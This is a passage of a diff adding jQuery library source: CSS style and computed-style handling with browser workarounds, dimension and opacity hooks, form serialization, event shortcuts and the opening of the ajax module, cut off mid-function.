+		// Make sure that we're working with the right name
+		var ret, type, hooks,
+			origName = jQuery.camelCase( name ),
+			style = elem.style;
+
+		name = jQuery.cssProps[ origName ] || ( jQuery.cssProps[ origName ] = vendorPropName( style, origName ) );
+
+		// gets hook for the prefixed version
+		// followed by the unprefixed version
+		hooks = jQuery.cssHooks[ name ] || jQuery.cssHooks[ origName ];
+
+		// Check if we're setting a value
+		if ( value !== undefined ) {
+			type = typeof value;
+
+			// convert relative number strings (+= or -=) to relative numbers. #7345
+			if ( type === "string" && (ret = rrelNum.exec( value )) ) {
+				value = ( ret[1] + 1 ) * ret[2] + parseFloat( jQuery.css( elem, name ) );
+				// Fixes bug #9237
+				type = "number";
+			}
+
+			// Make sure that NaN and null values aren't set. See: #7116
+			if ( value == null || type === "number" && isNaN( value ) ) {
+				return;
+			}
+
+			// If a number was passed in, add 'px' to the (except for certain CSS properties)
+			if ( type === "number" && !jQuery.cssNumber[ origName ] ) {
+				value += "px";
+			}
+
+			// Fixes #8908, it can be done more correctly by specifing setters in cssHooks,
+			// but it would mean to define eight (for every problematic property) identical functions
+			if ( !jQuery.support.clearCloneStyle && value === "" && name.indexOf("background") === 0 ) {
+				style[ name ] = "inherit";
+			}
+
+			// If a hook was provided, use that value, otherwise just set the specified value
+			if ( !hooks || !("set" in hooks) || (value = hooks.set( elem, value, extra )) !== undefined ) {
+
+				// Wrapped to prevent IE from throwing errors when 'invalid' values are provided
+				// Fixes bug #5509
+				try {
+					style[ name ] = value;
+				} catch(e) {}
+			}
+
+		} else {
+			// If a hook was provided get the non-computed value from there
+			if ( hooks && "get" in hooks && (ret = hooks.get( elem, false, extra )) !== undefined ) {
+				return ret;
+			}
+
+			// Otherwise just get the value from the style object
+			return style[ name ];
+		}
+	},
+
+	css: function( elem, name, extra, styles ) {
+		var num, val, hooks,
+			origName = jQuery.camelCase( name );
+
+		// Make sure that we're working with the right name
+		name = jQuery.cssProps[ origName ] || ( jQuery.cssProps[ origName ] = vendorPropName( elem.style, origName ) );
+
+		// gets hook for the prefixed version
+		// followed by the unprefixed version
+		hooks = jQuery.cssHooks[ name ] || jQuery.cssHooks[ origName ];
+
+		// If a hook was provided get the computed value from there
+		if ( hooks && "get" in hooks ) {
+			val = hooks.get( elem, true, extra );
+		}
+
+		// Otherwise, if a way to get the computed value exists, use that
+		if ( val === undefined ) {
+			val = curCSS( elem, name, styles );
+		}
+
+		//convert "normal" to computed value
+		if ( val === "normal" && name in cssNormalTransform ) {
+			val = cssNormalTransform[ name ];
+		}
+
+		// Return, converting to number if forced or a qualifier was provided and val looks numeric
+		if ( extra === "" || extra ) {
+			num = parseFloat( val );
+			return extra === true || jQuery.isNumeric( num ) ? num || 0 : val;
+		}
+		return val;
+	}
+});
+
+// NOTE: we've included the "window" in window.getComputedStyle
+// because jsdom on node.js will break without it.
+if ( window.getComputedStyle ) {
+	getStyles = function( elem ) {
+		return window.getComputedStyle( elem, null );
+	};
+
+	curCSS = function( elem, name, _computed ) {
+		var width, minWidth, maxWidth,
+			computed = _computed || getStyles( elem ),
+
+			// getPropertyValue is only needed for .css('filter') in IE9, see #12537
+			ret = computed ? computed.getPropertyValue( name ) || computed[ name ] : undefined,
+			style = elem.style;
+
+		if ( computed ) {
+
+			if ( ret === "" && !jQuery.contains( elem.ownerDocument, elem ) ) {
+				ret = jQuery.style( elem, name );
+			}
+
+			// A tribute to the "awesome hack by Dean Edwards"
+			// Chrome < 17 and Safari 5.0 uses "computed value" instead of "used value" for margin-right
+			// Safari 5.1.7 (at least) returns percentage for a larger set of values, but width seems to be reliably pixels
+			// this is against the CSSOM draft spec: http://dev.w3.org/csswg/cssom/#resolved-values
+			if ( rnumnonpx.test( ret ) && rmargin.test( name ) ) {
+
+				// Remember the original values
+				width = style.width;
+				minWidth = style.minWidth;
+				maxWidth = style.maxWidth;
+
+				// Put in the new values to get a computed value out
+				style.minWidth = style.maxWidth = style.width = ret;
+				ret = computed.width;
+
+				// Revert the changed values
+				style.width = width;
+				style.minWidth = minWidth;
+				style.maxWidth = maxWidth;
+			}
+		}
+
+		return ret;
+	};
+} else if ( document.documentElement.currentStyle ) {
+	getStyles = function( elem ) {
+		return elem.currentStyle;
+	};
+
+	curCSS = function( elem, name, _computed ) {
+		var left, rs, rsLeft,
+			computed = _computed || getStyles( elem ),
+			ret = computed ? computed[ name ] : undefined,
+			style = elem.style;
+
+		// Avoid setting ret to empty string here
+		// so we don't default to auto
+		if ( ret == null && style && style[ name ] ) {
+			ret = style[ name ];
+		}
+
+		// From the awesome hack by Dean Edwards
+		// http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291
+
+		// If we're not dealing with a regular pixel number
+		// but a number that has a weird ending, we need to convert it to pixels
+		// but not position css attributes, as those are proportional to the parent element instead
+		// and we can't measure the parent instead because it might trigger a "stacking dolls" problem
+		if ( rnumnonpx.test( ret ) && !rposition.test( name ) ) {
+
+			// Remember the original values
+			left = style.left;
+			rs = elem.runtimeStyle;
+			rsLeft = rs && rs.left;
+
+			// Put in the new values to get a computed value out
+			if ( rsLeft ) {
+				rs.left = elem.currentStyle.left;
+			}
+			style.left = name === "fontSize" ? "1em" : ret;
+			ret = style.pixelLeft + "px";
+
+			// Revert the changed values
+			style.left = left;
+			if ( rsLeft ) {
+				rs.left = rsLeft;
+			}
+		}
+
+		return ret === "" ? "auto" : ret;
+	};
+}
+
+function setPositiveNumber( elem, value, subtract ) {
+	var matches = rnumsplit.exec( value );
+	return matches ?
+		// Guard against undefined "subtract", e.g., when used as in cssHooks
+		Math.max( 0, matches[ 1 ] - ( subtract || 0 ) ) + ( matches[ 2 ] || "px" ) :
+		value;
+}
+
+function augmentWidthOrHeight( elem, name, extra, isBorderBox, styles ) {
+	var i = extra === ( isBorderBox ? "border" : "content" ) ?
+		// If we already have the right measurement, avoid augmentation
+		4 :
+		// Otherwise initialize for horizontal or vertical properties
+		name === "width" ? 1 : 0,
+
+		val = 0;
+
+	for ( ; i < 4; i += 2 ) {
+		// both box models exclude margin, so add it if we want it
+		if ( extra === "margin" ) {
+			val += jQuery.css( elem, extra + cssExpand[ i ], true, styles );
+		}
+
+		if ( isBorderBox ) {
+			// border-box includes padding, so remove it if we want content
+			if ( extra === "content" ) {
+				val -= jQuery.css( elem, "padding" + cssExpand[ i ], true, styles );
+			}
+
+			// at this point, extra isn't border nor margin, so remove border
+			if ( extra !== "margin" ) {
+				val -= jQuery.css( elem, "border" + cssExpand[ i ] + "Width", true, styles );
+			}
+		} else {
+			// at this point, extra isn't content, so add padding
+			val += jQuery.css( elem, "padding" + cssExpand[ i ], true, styles );
+
+			// at this point, extra isn't content nor padding, so add border
+			if ( extra !== "padding" ) {
+				val += jQuery.css( elem, "border" + cssExpand[ i ] + "Width", true, styles );
+			}
+		}
+	}
+
+	return val;
+}
+
+function getWidthOrHeight( elem, name, extra ) {
+
+	// Start with offset property, which is equivalent to the border-box value
+	var valueIsBorderBox = true,
+		val = name === "width" ? elem.offsetWidth : elem.offsetHeight,
+		styles = getStyles( elem ),
+		isBorderBox = jQuery.support.boxSizing && jQuery.css( elem, "boxSizing", false, styles ) === "border-box";
+
+	// some non-html elements return undefined for offsetWidth, so check for null/undefined
+	// svg - https://bugzilla.mozilla.org/show_bug.cgi?id=649285
+	// MathML - https://bugzilla.mozilla.org/show_bug.cgi?id=491668
+	if ( val <= 0 || val == null ) {
+		// Fall back to computed then uncomputed css if necessary
+		val = curCSS( elem, name, styles );
+		if ( val < 0 || val == null ) {
+			val = elem.style[ name ];
+		}
+
+		// Computed unit is not pixels. Stop here and return.
+		if ( rnumnonpx.test(val) ) {
+			return val;
+		}
+
+		// we need the check for style in case a browser which returns unreliable values
+		// for getComputedStyle silently falls back to the reliable elem.style
+		valueIsBorderBox = isBorderBox && ( jQuery.support.boxSizingReliable || val === elem.style[ name ] );
+
+		// Normalize "", auto, and prepare for extra
+		val = parseFloat( val ) || 0;
+	}
+
+	// use the active box-sizing model to add/subtract irrelevant styles
+	return ( val +
+		augmentWidthOrHeight(
+			elem,
+			name,
+			extra || ( isBorderBox ? "border" : "content" ),
+			valueIsBorderBox,
+			styles
+		)
+	) + "px";
+}
+
+// Try to determine the default display value of an element
+function css_defaultDisplay( nodeName ) {
+	var doc = document,
+		display = elemdisplay[ nodeName ];
+
+	if ( !display ) {
+		display = actualDisplay( nodeName, doc );
+
+		// If the simple way fails, read from inside an iframe
+		if ( display === "none" || !display ) {
+			// Use the already-created iframe if possible
+			iframe = ( iframe ||
+				jQuery("<iframe frameborder='0' width='0' height='0'/>")
+				.css( "cssText", "display:block !important" )
+			).appendTo( doc.documentElement );
+
+			// Always write a new HTML skeleton so Webkit and Firefox don't choke on reuse
+			doc = ( iframe[0].contentWindow || iframe[0].contentDocument ).document;
+			doc.write("<!doctype html><html><body>");
+			doc.close();
+
+			display = actualDisplay( nodeName, doc );
+			iframe.detach();
+		}
+
+		// Store the correct default display
+		elemdisplay[ nodeName ] = display;
+	}
+
+	return display;
+}
+
+// Called ONLY from within css_defaultDisplay
+function actualDisplay( name, doc ) {
+	var elem = jQuery( doc.createElement( name ) ).appendTo( doc.body ),
+		display = jQuery.css( elem[0], "display" );
+	elem.remove();
+	return display;
+}
+
+jQuery.each([ "height", "width" ], function( i, name ) {
+	jQuery.cssHooks[ name ] = {
+		get: function( elem, computed, extra ) {
+			if ( computed ) {
+				// certain elements can have dimension info if we invisibly show them
+				// however, it must have a current display style that would benefit from this
+				return elem.offsetWidth === 0 && rdisplayswap.test( jQuery.css( elem, "display" ) ) ?
+					jQuery.swap( elem, cssShow, function() {
+						return getWidthOrHeight( elem, name, extra );
+					}) :
+					getWidthOrHeight( elem, name, extra );
+			}
+		},
+
+		set: function( elem, value, extra ) {
+			var styles = extra && getStyles( elem );
+			return setPositiveNumber( elem, value, extra ?
+				augmentWidthOrHeight(
+					elem,
+					name,
+					extra,
+					jQuery.support.boxSizing && jQuery.css( elem, "boxSizing", false, styles ) === "border-box",
+					styles
+				) : 0
+			);
+		}
+	};
+});
+
+if ( !jQuery.support.opacity ) {
+	jQuery.cssHooks.opacity = {
+		get: function( elem, computed ) {
+			// IE uses filters for opacity
+			return ropacity.test( (computed && elem.currentStyle ? elem.currentStyle.filter : elem.style.filter) || "" ) ?
+				( 0.01 * parseFloat( RegExp.$1 ) ) + "" :
+				computed ? "1" : "";
+		},
+
+		set: function( elem, value ) {
+			var style = elem.style,
+				currentStyle = elem.currentStyle,
+				opacity = jQuery.isNumeric( value ) ? "alpha(opacity=" + value * 100 + ")" : "",
+				filter = currentStyle && currentStyle.filter || style.filter || "";
+
+			// IE has trouble with opacity if it does not have layout
+			// Force it by setting the zoom level
+			style.zoom = 1;
+
+			// if setting opacity to 1, and no other filters exist - attempt to remove filter attribute #6652
+			// if value === "", then remove inline opacity #12685
+			if ( ( value >= 1 || value === "" ) &&
+					jQuery.trim( filter.replace( ralpha, "" ) ) === "" &&
+					style.removeAttribute ) {
+
+				// Setting style.filter to null, "" & " " still leave "filter:" in the cssText
+				// if "filter:" is present at all, clearType is disabled, we want to avoid this
+				// style.removeAttribute is IE Only, but so apparently is this code path...
+				style.removeAttribute( "filter" );
+
+				// if there is no filter style applied in a css rule or unset inline opacity, we are done
+				if ( value === "" || currentStyle && !currentStyle.filter ) {
+					return;
+				}
+			}
+
+			// otherwise, set new filter values
+			style.filter = ralpha.test( filter ) ?
+				filter.replace( ralpha, opacity ) :
+				filter + " " + opacity;
+		}
+	};
+}
+
+// These hooks cannot be added until DOM ready because the support test
+// for it is not run until after DOM ready
+jQuery(function() {
+	if ( !jQuery.support.reliableMarginRight ) {
+		jQuery.cssHooks.marginRight = {
+			get: function( elem, computed ) {
+				if ( computed ) {
+					// WebKit Bug 13343 - getComputedStyle returns wrong value for margin-right
+					// Work around by temporarily setting element display to inline-block
+					return jQuery.swap( elem, { "display": "inline-block" },
+						curCSS, [ elem, "marginRight" ] );
+				}
+			}
+		};
+	}
+
+	// Webkit bug: https://bugs.webkit.org/show_bug.cgi?id=29084
+	// getComputedStyle returns percent when specified for top/left/bottom/right
+	// rather than make the css module depend on the offset module, we just check for it here
+	if ( !jQuery.support.pixelPosition && jQuery.fn.position ) {
+		jQuery.each( [ "top", "left" ], function( i, prop ) {
+			jQuery.cssHooks[ prop ] = {
+				get: function( elem, computed ) {
+					if ( computed ) {
+						computed = curCSS( elem, prop );
+						// if curCSS returns percentage, fallback to offset
+						return rnumnonpx.test( computed ) ?
+							jQuery( elem ).position()[ prop ] + "px" :
+							computed;
+					}
+				}
+			};
+		});
+	}
+
+});
+
+if ( jQuery.expr && jQuery.expr.filters ) {
+	jQuery.expr.filters.hidden = function( elem ) {
+		// Support: Opera <= 12.12
+		// Opera reports offsetWidths and offsetHeights less than zero on some elements
+		return elem.offsetWidth <= 0 && elem.offsetHeight <= 0 ||
+			(!jQuery.support.reliableHiddenOffsets && ((elem.style && elem.style.display) || jQuery.css( elem, "display" )) === "none");
+	};
+
+	jQuery.expr.filters.visible = function( elem ) {
+		return !jQuery.expr.filters.hidden( elem );
+	};
+}
+
+// These hooks are used by animate to expand properties
+jQuery.each({
+	margin: "",
+	padding: "",
+	border: "Width"
+}, function( prefix, suffix ) {
+	jQuery.cssHooks[ prefix + suffix ] = {
+		expand: function( value ) {
+			var i = 0,
+				expanded = {},
+
+				// assumes a single number if not a string
+				parts = typeof value === "string" ? value.split(" ") : [ value ];
+
+			for ( ; i < 4; i++ ) {
+				expanded[ prefix + cssExpand[ i ] + suffix ] =
+					parts[ i ] || parts[ i - 2 ] || parts[ 0 ];
+			}
+
+			return expanded;
+		}
+	};
+
+	if ( !rmargin.test( prefix ) ) {
+		jQuery.cssHooks[ prefix + suffix ].set = setPositiveNumber;
+	}
+});
+var r20 = /%20/g,
+	rbracket = /\[\]$/,
+	rCRLF = /\r?\n/g,
+	rsubmitterTypes = /^(?:submit|button|image|reset|file)$/i,
+	rsubmittable = /^(?:input|select|textarea|keygen)/i;
+
+jQuery.fn.extend({
+	serialize: function() {
+		return jQuery.param( this.serializeArray() );
+	},
+	serializeArray: function() {
+		return this.map(function(){
+			// Can add propHook for "elements" to filter or add form elements
+			var elements = jQuery.prop( this, "elements" );
+			return elements ? jQuery.makeArray( elements ) : this;
+		})
+		.filter(function(){
+			var type = this.type;
+			// Use .is(":disabled") so that fieldset[disabled] works
+			return this.name && !jQuery( this ).is( ":disabled" ) &&
+				rsubmittable.test( this.nodeName ) && !rsubmitterTypes.test( type ) &&
+				( this.checked || !manipulation_rcheckableType.test( type ) );
+		})
+		.map(function( i, elem ){
+			var val = jQuery( this ).val();
+
+			return val == null ?
+				null :
+				jQuery.isArray( val ) ?
+					jQuery.map( val, function( val ){
+						return { name: elem.name, value: val.replace( rCRLF, "\r\n" ) };
+					}) :
+					{ name: elem.name, value: val.replace( rCRLF, "\r\n" ) };
+		}).get();
+	}
+});
+
+//Serialize an array of form elements or a set of
+//key/values into a query string
+jQuery.param = function( a, traditional ) {
+	var prefix,
+		s = [],
+		add = function( key, value ) {
+			// If value is a function, invoke it and return its value
+			value = jQuery.isFunction( value ) ? value() : ( value == null ? "" : value );
+			s[ s.length ] = encodeURIComponent( key ) + "=" + encodeURIComponent( value );
+		};
+
+	// Set traditional to true for jQuery <= 1.3.2 behavior.
+	if ( traditional === undefined ) {
+		traditional = jQuery.ajaxSettings && jQuery.ajaxSettings.traditional;
+	}
+
+	// If an array was passed in, assume that it is an array of form elements.
+	if ( jQuery.isArray( a ) || ( a.jquery && !jQuery.isPlainObject( a ) ) ) {
+		// Serialize the form elements
+		jQuery.each( a, function() {
+			add( this.name, this.value );
+		});
+
+	} else {
+		// If traditional, encode the "old" way (the way 1.3.2 or older
+		// did it), otherwise encode params recursively.
+		for ( prefix in a ) {
+			buildParams( prefix, a[ prefix ], traditional, add );
+		}
+	}
+
+	// Return the resulting serialization
+	return s.join( "&" ).replace( r20, "+" );
+};
+
+function buildParams( prefix, obj, traditional, add ) {
+	var name;
+
+	if ( jQuery.isArray( obj ) ) {
+		// Serialize array item.
+		jQuery.each( obj, function( i, v ) {
+			if ( traditional || rbracket.test( prefix ) ) {
+				// Treat each array item as a scalar.
+				add( prefix, v );
+
+			} else {
+				// Item is non-scalar (array or object), encode its numeric index.
+				buildParams( prefix + "[" + ( typeof v === "object" ? i : "" ) + "]", v, traditional, add );
+			}
+		});
+
+	} else if ( !traditional && jQuery.type( obj ) === "object" ) {
+		// Serialize object item.
+		for ( name in obj ) {
+			buildParams( prefix + "[" + name + "]", obj[ name ], traditional, add );
+		}
+
+	} else {
+		// Serialize scalar item.
+		add( prefix, obj );
+	}
+}
+jQuery.each( ("blur focus focusin focusout load resize scroll unload click dblclick " +
+	"mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave " +
+	"change select submit keydown keypress keyup error contextmenu").split(" "), function( i, name ) {
+
+	// Handle event binding
+	jQuery.fn[ name ] = function( data, fn ) {
+		return arguments.length > 0 ?
+			this.on( name, null, data, fn ) :
+			this.trigger( name );
+	};
+});
+
+jQuery.fn.extend({
+	hover: function( fnOver, fnOut ) {
+		return this.mouseenter( fnOver ).mouseleave( fnOut || fnOver );
+	},
+
+	bind: function( types, data, fn ) {
+		return this.on( types, null, data, fn );
+	},
+	unbind: function( types, fn ) {
+		return this.off( types, null, fn );
+	},
+
+	delegate: function( selector, types, data, fn ) {
+		return this.on( types, selector, data, fn );
+	},
+	undelegate: function( selector, types, fn ) {
+		// ( namespace ) or ( selector, types [, fn] )
+		return arguments.length === 1 ? this.off( selector, "**" ) : this.off( types, selector || "**", fn );
+	}
+});
+var
+	// Document location
+	ajaxLocParts,
+	ajaxLocation,
+	ajax_nonce = jQuery.now(),
+
+	ajax_rquery = /\?/,
+	rhash = /#.*$/,
+	rts = /([?&])_=[^&]*/,
+	rheaders = /^(.*?):[ \t]*([^\r\n]*)\r?$/mg, // IE leaves an \r character at EOL
+	// #7653, #8125, #8152: local protocol detection
+	rlocalProtocol = /^(?:about|app|app-storage|.+-extension|file|res|widget):$/,
+	rnoContent = /^(?:GET|HEAD)$/,
+	rprotocol = /^\/\//,
+	rurl = /^([\w.+-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,
+
+	// Keep a copy of the old load method
+	_load = jQuery.fn.load,
+
+	/* Prefilters
+	 * 1) They are useful to introduce custom dataTypes (see ajax/jsonp.js for an example)
+	 * 2) These are called:
+	 *    - BEFORE asking for a transport
+	 *    - AFTER param serialization (s.data is a string if s.processData is true)
+	 * 3) key is the dataType
+	 * 4) the catchall symbol "*" can be used
+	 * 5) execution will start with transport dataType and THEN continue down to "*" if needed
+	 */
+	prefilters = {},
+
+	/* Transports bindings
+	 * 1) key is the dataType
+	 * 2) the catchall symbol "*" can be used
+	 * 3) selection will start with transport dataType and THEN go to "*" if needed
+	 */
+	transports = {},
+
+	// Avoid comment-prolog char sequence (#10098); must appease lint and evade compression
+	allTypes = "*/".concat("*");
+
+// #8138, IE may throw an exception when accessing
+// a field from window.location if document.domain has been set
+try {
+	ajaxLocation = location.href;
+} catch( e ) {
+	// Use the href attribute of an A element
+	// since IE will modify it given document.location
+	ajaxLocation = document.createElement( "a" );
+	ajaxLocation.href = "";
+	ajaxLocation = ajaxLocation.href;
+}
+
+// Segment location into parts
+ajaxLocParts = rurl.exec( ajaxLocation.toLowerCase() ) || [];
+
+// Base "constructor" for jQuery.ajaxPrefilter and jQuery.ajaxTransport
+function addToPrefiltersOrTransports( structure ) {
+
+	// dataTypeExpression is optional and defaults to "*"
+	return function( dataTypeExpression, func ) {
+
+		if ( typeof dataTypeExpression !== "string" ) {
+			func = dataTypeExpression;
+			dataTypeExpression = "*";
+		}
+
+		var dataType,
+			i = 0,
+			dataTypes = dataTypeExpression.toLowerCase().match( core_rnotwhite ) || [];
+
+		if ( jQuery.isFunction( func ) ) {
+			// For each dataType in the dataTypeExpression
+			while ( (dataType = dataTypes[i++]) ) {
+				// Prepend if requested
+				if ( dataType[0] === "+" ) {
+					dataType = dataType.slice( 1 ) || "*";
+					(structure[ dataType ] = structure[ dataType ] || []).unshift( func );
+
+				// Otherwise append
+				} else {
+					(structure[ dataType ] = structure[ dataType ] || []).push( func );
+				}
+			}
+		}
+	};
+}
+
+// Base inspection function for prefilters and transports
+function inspectPrefiltersOrTransports( structure, options, originalOptions, jqXHR ) {
+
+	var inspected = {},
+		seekingTransport = ( structure === transports );
+
+	function inspect( dataType ) {
+		var selected;
+		inspected[ dataType ] = true;
+		jQuery.each( structure[ dataType ] || [], function( _, prefilterOrFactory ) {
+			var dataTypeOrTransport = prefilterOrFactory( options, originalOptions, jqXHR );
+			if( typeof dataTypeOrTransport === "string" && !seekingTransport && !inspected[ dataTypeOrTransport ] ) {
+				options.dataTypes.unshift( dataTypeOrTransport );
+				inspect( dataTypeOrTransport );
+				return false;
+			} else if ( seekingTransport ) {
+				return !( selected = dataTypeOrTransport );
+			}
+		});
+		return selected;
+	}
+
+	return inspect( options.dataTypes[ 0 ] ) || !inspected[ "*" ] && inspect( "*" );
+}
+
+// A special extend for ajax options
+// that takes "flat" options (not to be deep extended)
+// Fixes #9887
+function ajaxExtend( target, src ) {
+	var deep, key,
+		flatOptions = jQuery.ajaxSettings.flatOptions || {};
+
+	for ( key in src ) {
+		if ( src[ key ] !== undefined ) {
+			( flatOptions[ key ] ? target : ( deep || (deep = {}) ) )[ key ] = src[ key ];
+		}
+	}
+	if ( deep ) {
+		jQuery.extend( true, target, deep );
+	}
+
+	return target;
+}
+
+jQuery.fn.load = function( url, params, callback ) {
+	if ( typeof url !== "string" && _load ) {
+		return _load.apply( this, arguments );
+	}
+
+	var selector, response, type,
+		self = this,
+		off = url.indexOf(" ");
+
+	if ( off >= 0 ) {
+		selector = url.slice( off, url.length );
+		url = url.slice( 0, off );
+	}
+
+	// If it's a function
+	if ( jQuery.isFunction( params ) ) {
+
+		// We assume that it's the callback
+		callback = params;
+		params = undefined;
+
+	// Otherwise, build a param string
+	} else if ( params && typeof params === "object" ) {
+		type = "POST";
+	}
+
+	// If we have elements to modify, make the request
+	if ( self.length > 0 ) {
+		jQuery.ajax({
+			url: url,
+
+			// if "type" variable is undefined, then "GET" method will be used
+			type: type,
+			dataType: "html",
+			data: params
+		}).done(function( responseText ) {
+
+			// Save response for use in complete callback
+			response = arguments;
+
+			self.html( selector ?
+
+				// If a selector was specified, locate the right elements in a dummy div
+				// Exclude scripts to avoid IE 'Permission Denied' errors
+				jQuery("<div>").append( jQuery.parseHTML( responseText ) ).find( selector ) :
+
+				// Otherwise use the full result
+				responseText );
+
+		}).complete( callback && function( jqXHR, status ) {
+			self.each( callback, response || [ jqXHR.responseText, status, jqXHR ] );
+		});
+	}
+
+	return this;
+};
+
+// Attach a bunch of functions for handling common AJAX events
+jQuery.each( [ "ajaxStart", "ajaxStop", "ajaxComplete", "ajaxError", "ajaxSuccess", "ajaxSend" ], function( i, type ){
+	jQuery.fn[ type ] = function( fn ){
+		return this.on( type, fn );
+	};
+});
+
+jQuery.extend({
+
+	// Counter for holding the number of active queries
+	active: 0,
+
+	// Last-Modified header cache for next request
+	lastModified: {},
+	etag: {},
+
+	ajaxSettings: {
+		url: ajaxLocation,
+		type: "GET",
+		isLocal: rlocalProtocol.test( ajaxLocParts[ 1 ] ),
+		global: true,
+		processData: true,
+		async: true,
+		contentType: "application/x-www-form-urlencoded; charset=UTF-8",
+		/*
+		timeout: 0,
+		data: null,
+		dataType: null,
+		username: null,
+		password: null,
+		cache: null,
+		throws: false,
+		traditional: false,
+		headers: {},
+		*/
+
+		accepts: {
+			"*": allTypes,
+			text: "text/plain",
+			html: "text/html",
+			xml: "application/xml, text/xml",
+			json: "application/json, text/javascript"
+		},
+
+		contents: {
+			xml: /xml/,
+			html: /html/,
+			json: /json/
+		},
+
+		responseFields: {
+			xml: "responseXML",
+			text: "responseText",
+			json: "responseJSON"
+		},
+
+		// Data converters
+		// Keys separate source (or catchall "*") and destination types with a single space
+		converters: {
+
+			// Convert anything to text
+			"* text": String,
+
+			// Text to html (true = no transformation)
+			"text html": true,
+
+			// Evaluate text as a json expression
+			"text json": jQuery.parseJSON,
+
+			// Parse text as xml
+			"text xml": jQuery.parseXML
+		},
+
+		// For options that shouldn't be deep extended:
+		// you can add your own custom options here if
+		// and when you create one that shouldn't be
+		// deep extended (see ajaxExtend)
+		flatOptions: {
+			url: true,
+			context: true
+		}
+	},
+
+	// Creates a full fledged settings object into target
+	// with both ajaxSettings and settings fields.
+	// If target is omitted, writes into ajaxSettings.
+	ajaxSetup: function( target, settings ) {
+		return settings ?
+
+			// Building a settings object
+			ajaxExtend( ajaxExtend( target, jQuery.ajaxSettings ), settings ) :
+
+			// Extending ajaxSettings
+			ajaxExtend( jQuery.ajaxSettings, target );
+	},
+
+	ajaxPrefilter: addToPrefiltersOrTransports( prefilters ),
+	ajaxTransport: addToPrefiltersOrTransports( transports ),
+
+	// Main method
+	ajax: function( url, options ) {
+
+		// If url is an object, simulate pre-1.5 signature
+		if ( typeof url === "object" ) {
+			options = url;
+			url = undefined;
+		}
+
+		// Force options to be an object
+		options = options || {};
+
+		var // Cross-domain detection vars
+			parts,
+			// Loop variable
+			i,
+			// URL without anti-cache param
+			cacheURL,
+			// Response headers as string
+			responseHeadersString,
+			// timeout handle
+			timeoutTimer,
+
+			// To know if global events are to be dispatched
+			fireGlobals,
+
+			transport,
+			// Response headers
+			responseHeaders,
+			// Create the final options object
+			s = jQuery.ajaxSetup( {}, options ),
+			// Callbacks context
+			callbackContext = s.context || s,
+			// Context for global events is callbackContext if it is a DOM node or jQuery collection
+			globalEventContext = s.context && ( callbackContext.nodeType || callbackContext.jquery ) ?
+				jQuery( callbackContext ) :
+				jQuery.event,
+			// Deferreds
+			deferred = jQuery.Deferred(),
+			completeDeferred = jQuery.Callbacks("once memory"),
+			// Status-dependent callbacks
+			statusCode = s.statusCode || {},
+			// Headers (they are sent all at once)
+			requestHeaders = {},
+			requestHeadersNames = {},
+			// The jqXHR state
+			state = 0,
+			// Default abort message
+			strAbort = "canceled",
+			// Fake xhr
+			jqXHR = {
+				readyState: 0,
+
+				// Builds headers hashtable if needed
+				getResponseHeader: function( key ) {
+					var match;
+					if ( state === 2 ) {
+						if ( !responseHeaders ) {
+							responseHeaders = {};
+							while ( (match = rheaders.exec( responseHeadersString )) ) {
+								responseHeaders[ match[1].toLowerCase() ] = match[ 2 ];
+							}
+						}
+						match = responseHeaders[ key.toLowerCase() ];
+					}
+					return match == null ? null : match;
+				},
+
+				// Raw string
+				getAllResponseHeaders: function() {
+					return state === 2 ? responseHeadersString : null;
+				},
+
+				// Caches the header
+				setRequestHeader: function( name, value ) {
+					var lname = name.toLowerCase();
+					if ( !state ) {
+						name = requestHeadersNames[ lname ] = requestHeadersNames[ lname ] || name;
+						requestHeaders[ name ] = value;
+					}
+					return this;
+				},
+
+				// Overrides response content-type header
+				overrideMimeType: function( type ) {
+					if ( !state ) {
+						s.mimeType = type;
+					}
+					return this;
+				},
+
+				// Status-dependent callbacks
+				statusCode: function( map ) {
+					var code;
+					if ( map ) {
+						if ( state < 2 ) {
+							for ( code in map ) {
+								// Lazy-add the new callback in a way that preserves old ones
+								statusCode[ code ] = [ statusCode[ code ], map[ code ] ];
+							}
+						} else {
+							// Execute the appropriate callbacks
+							jqXHR.always( map[ jqXHR.status ] );
+						}
+					}
+					return this;
+				},
+
+				// Cancel the request
+				abort: function( statusText ) {
+					var finalText = statusText || strAbort;
+					if ( transport ) {
+						transport.abort( finalText );
+					}
+					done( 0, finalText );
+					return this;
+				}
+			};
+
+		// Attach deferreds
+		deferred.promise( jqXHR ).complete = completeDeferred.add;
+		jqXHR.success = jqXHR.done;
+		jqXHR.error = jqXHR.fail;
+
+		// Remove hash character (#7531: and string promotion)
+		// Add protocol if not provided (#5866: IE7 issue with protocol-less urls)
+		// Handle falsy url in the settings object (#10093: consistency with old signature)
+		// We also use the url parameter if available
+		s.url = ( ( url || s.url || ajaxLocation ) + "" ).replace( rhash, "" ).replace( rprotocol, ajaxLocParts[ 1 ] + "//" );
+
+		// Alias method option to type as per ticket #12004
+		s.type = options.method || options.type || s.method || s.type;
+
+		// Extract dataTypes list
+		s.dataTypes = jQuery.trim( s.dataType || "*" ).toLowerCase().match( core_rnotwhite ) || [""];
+
+		// A cross-domain request is in order when we have a protocol:host:port mismatch
+		if ( s.crossDomain == null ) {
+			parts = rurl.exec( s.url.toLowerCase() );
+			s.crossDomain = !!( parts &&
+				( parts[ 1 ] !== ajaxLocParts[ 1 ] || parts[ 2 ] !== ajaxLocParts[ 2 ] ||
+					( parts[ 3 ] || ( parts[ 1 ] === "http:" ? "80" : "443" ) ) !==
+						( ajaxLocParts[ 3 ] || ( ajaxLocParts[ 1 ] === "http:" ? "80" : "443" ) ) )
+			);
+		}
+
+		// Convert data if not already a string
+		if ( s.data && s.processData && typeof s.data !== "string" ) {
+			s.data = jQuery.param( s.data, s.traditional );
+		}
+
+		// Apply prefilters
+		inspectPrefiltersOrTransports( prefilters, s, options, jqXHR );
+
+		// If request was aborted inside a prefilter, stop there
+		if ( state === 2 ) {
+			return jqXHR;
+		}
+
+		// We can fire global events as of now if asked to
+		fireGlobals = s.global;
+
+		// Watch for a new set of requests
+		if ( fireGlobals && jQuery.active++ === 0 ) {
+			jQuery.event.trigger("ajaxStart");
+		}
+
+		// Uppercase the type
+		s.type = s.type.toUpperCase();
+
+		// Determine if request has content
+		s.hasContent = !rnoContent.test( s.type );
+
+		// Save the URL in case we're toying with the If-Modified-Since
+		// and/or If-None-Match header later on
+		cacheURL = s.url;
+
+		// More options handling for requests with no content
+		if ( !s.hasContent ) {
+
+			// If data is available, append data to url
+			if ( s.data ) {
